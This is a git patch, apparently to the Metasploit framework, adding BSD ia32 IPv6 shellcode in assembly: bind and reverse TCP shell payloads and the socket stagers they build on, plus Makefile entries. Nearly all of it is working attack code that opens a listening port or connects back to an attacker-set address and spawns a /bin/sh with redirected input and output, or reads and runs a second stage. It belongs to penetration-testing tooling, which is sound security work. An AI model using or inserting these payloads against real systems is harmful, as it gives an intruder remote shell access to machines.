From 7630ef17e33ae5888889a8615998a3e90ebc46a8 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 00:34:31 -0600 Subject: [PATCH] Add BSD IPv6 payloads (source only for now) --- external/source/shellcode/bsd/ia32/Makefile | 4 +- .../bsd/ia32/single_bind_tcp_shell_ipv6.asm | 36 ++++++ .../ia32/single_reverse_tcp_shell_ipv6.asm | 42 +++++++ .../bsd/ia32/stager_sock_bind_ipv6.asm | 108 ++++++++++++++++++ .../bsd/ia32/stager_sock_reverse_ipv6.asm | 95 +++++++++++++++ 5 files changed, 283 insertions(+), 2 deletions(-) create mode 100644 external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm create mode 100644 external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm diff --git a/external/source/shellcode/bsd/ia32/Makefile b/external/source/shellcode/bsd/ia32/Makefile index be00e42cd3..71c7e56332 100644 --- a/external/source/shellcode/bsd/ia32/Makefile +++ b/external/source/shellcode/bsd/ia32/Makefile @@ -1,7 +1,7 @@ ASM=nasm -STAGERS=stager_sock_bind stager_sock_find stager_sock_reverse +STAGERS=stager_sock_bind stager_sock_bind_ipv6 stager_sock_find stager_sock_reverse stager_sock_reverse_ipv6 STAGES=stage_tcp_shell -SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock +SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock single_reverse_tcp_shell_ipv6 single_bind_tcp_shell_ipv6 OBJS=${STAGERS} ${STAGES} ${SINGLE} include ../../Makefile.incl diff --git a/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm b/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm new file mode 100644 index 0000000000..484d240008 --- /dev/null +++ b/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm @@ -0,0 +1,36 @@ +;; +; +; Name: single_bind_tcp_shell +; Version: $Revision: 1628 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Single portbind TCP shell. +; +; Meta-Information: +; +; meta-shortname=BSD Bind TCP Shell +; meta-description=Listen on a port and spawn a shell +; meta-authors=skape +; meta-os=bsd +; meta-arch=ia32 +; meta-category=single +; meta-connection-type=bind +; meta-name=bind_tcp_shell +; meta-basemod=Msf::PayloadComponent::BindConnection +; meta-offset-lport=0x8 +;; +BITS 32 + +%define USE_SINGLE_STAGE 1 + +%include "generic.asm" +%include "stager_sock_bind_ipv6.asm" + +shell: + execve_binsh EXECUTE_REDIRECT_IO diff --git a/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm b/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm new file mode 100644 index 0000000000..5b1d635428 --- /dev/null +++ b/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm @@ -0,0 +1,42 @@ +;; +; +; Name: single_reverse_tcp_shell +; Version: $Revision: 1626 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Single reverse TCP shell. +; +; Meta-Information: +; +; meta-shortname=BSD Reverse TCP Shell +; meta-description=Connect back to the attacker and spawn a shell +; meta-authors=skape +; meta-os=bsd +; meta-arch=ia32 +; meta-category=single +; meta-connection-type=reverse +; meta-name=reverse_tcp_shell +; meta-basemod=Msf::PayloadComponent::ReverseConnection +; meta-offset-lhost=0x0a +; meta-offset-lport=0x13 +;; +BITS 32 + +%define USE_SINGLE_STAGE 1 +%define ASSUME_REG_EAX 0 + +; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD +; clears edx. +; %define ASSUME_REG_EDX 2 + +%include "stager_sock_reverse_ipv6.asm" +%include "generic.asm" + +shell: + execve_binsh EXECUTE_REDIRECT_IO diff --git a/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm new file mode 100644 index 0000000000..196328405e --- /dev/null +++ b/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm @@ -0,0 +1,108 @@ +;; +; +; Name: stager_sock_bind_ipv6 +; Qualities: Can Have Nulls +; Version: $Revision: 1628 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Implementation of a BSD portbind over IPv6 TCP stager. +; +; Meta-Information: +; +; meta-shortname=BSD Bind TCP Stager +; meta-description=Listen on a port for a connection and run a second stage +; meta-authors=skape , vlad902 , hdm +; meta-os=bsd +; meta-arch=ia32 +; meta-category=stager +; meta-connection-type=bind +; meta-name=bind_tcp_ipv6 +; meta-basemod=Msf::PayloadComponent::BindConnection +; meta-offset-lport=26 +;; +BITS 32 +GLOBAL main + +main: + +socket: + xor eax, eax + push eax ; Protocol: (IP=0) + inc eax + push eax ; Type: (SOCK_STREAM=1) + push byte 28 ; Domain: (PF_INET6=28) + push byte 97 + pop eax ; socket() + push eax ; padding + int 0x80 + mov ebx, eax ; save socket + + xor edx, edx + + push edx ; uint32_t sin6_scope_id; /* scope zone index */ + push edx ; struct in6_addr sin6_addr; /* IP6 address */ + push edx + push edx + push edx + push edx ; uint32_t sin6_flowinfo; /* IP6 flow information */ + push dword 0xbfbf1c1c + ; in_port_t sin6_port; /* Transport layer port # */ + ; uint8_t sin6_len; /* length of this struct */ + ; sa_family_t sin6_family; /* AF_INET6 */ + + mov ecx, esp + +bind: + push byte 28 + push ecx + push eax + push byte 104 + pop eax + push eax ; padding + int 0x80 + +listen: + mov al, 106 + int 0x80 + +accept: + push edx + push ebx +%ifndef USE_SINGLE_STAGE + mov dh, 0x10 +%endif + push edx + mov al, 30 + int 0x80 + +%ifndef USE_SINGLE_STAGE + +read: + push ecx + push eax + push ecx +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + push byte 0x3 + pop eax + int 0x80 + ret + +%else + +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + +%endif diff --git a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm new file mode 100644 index 0000000000..8a181d4b65 --- /dev/null +++ b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm @@ -0,0 +1,95 @@ +;; +; +; Name: stager_sock_reverse_ipv6 +; Qualities: Can Have Nulls +; Version: $Revision: 1626 $ +; License: +; +; This file is part of the Metasploit Exploit Framework +; and is subject to the same licenses and copyrights as +; the rest of this package. +; +; Description: +; +; Implementation of a BSD reverse TCP stager over IPv6 +; +; File descriptor in edi. +; +; Meta-Information: +; +; meta-shortname=BSD Reverse TCP Stager +; meta-description=Connect back to the framework and run a second stage +; meta-authors=skape , vlad902 , hdm +; meta-os=bsd +; meta-arch=ia32 +; meta-category=stager +; meta-connection-type=reverse +; meta-name=reverse_tcp_ipv6 +; meta-basemod=Msf::PayloadComponent::ReverseConnection +; meta-offset-lhost=43 +; meta-offset-lport=36 +; meta-offset-scope=59 +;; +BITS 32 +GLOBAL main + +main: + +socket: + + xor eax, eax + push eax ; Protocol: (IP=0) + inc eax + push eax ; Type: (SOCK_STREAM=1) + push byte 28 ; Domain: (PF_INET6=28) + + push byte 97 + pop eax ; socket() + push eax ; padding + int 0x80 + jmp short bounce_to_connect + +connect: + pop ecx + push byte 28 + push ecx + push eax + +%ifdef FD_REG_EBX + xchg eax, ebx +%else + xchg eax, edi +%endif + + push byte 98 + pop eax + push eax ; padding + int 0x80 + + jmp short skip_bounce + +bounce_to_connect: + call connect + +ipv6_address: + db 28 ; uint8_t sin6_len; /* length of this struct */ + db 28 ; sa_family_t sin6_family; /* AF_INET6 */ + dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */ + dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */ + dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */ + dd 0x48474645 + dd 0x4d4b4a49 + dd 0x51504f4e + dd 0 ; uint32_t sin6_scope_id; /* scope zone index */ + +skip_bounce: + +%ifndef USE_SINGLE_STAGE + +read: + mov al, 0x3 + mov byte [ecx - 0x3], 0x10 + int 0x80 + ret + +%endif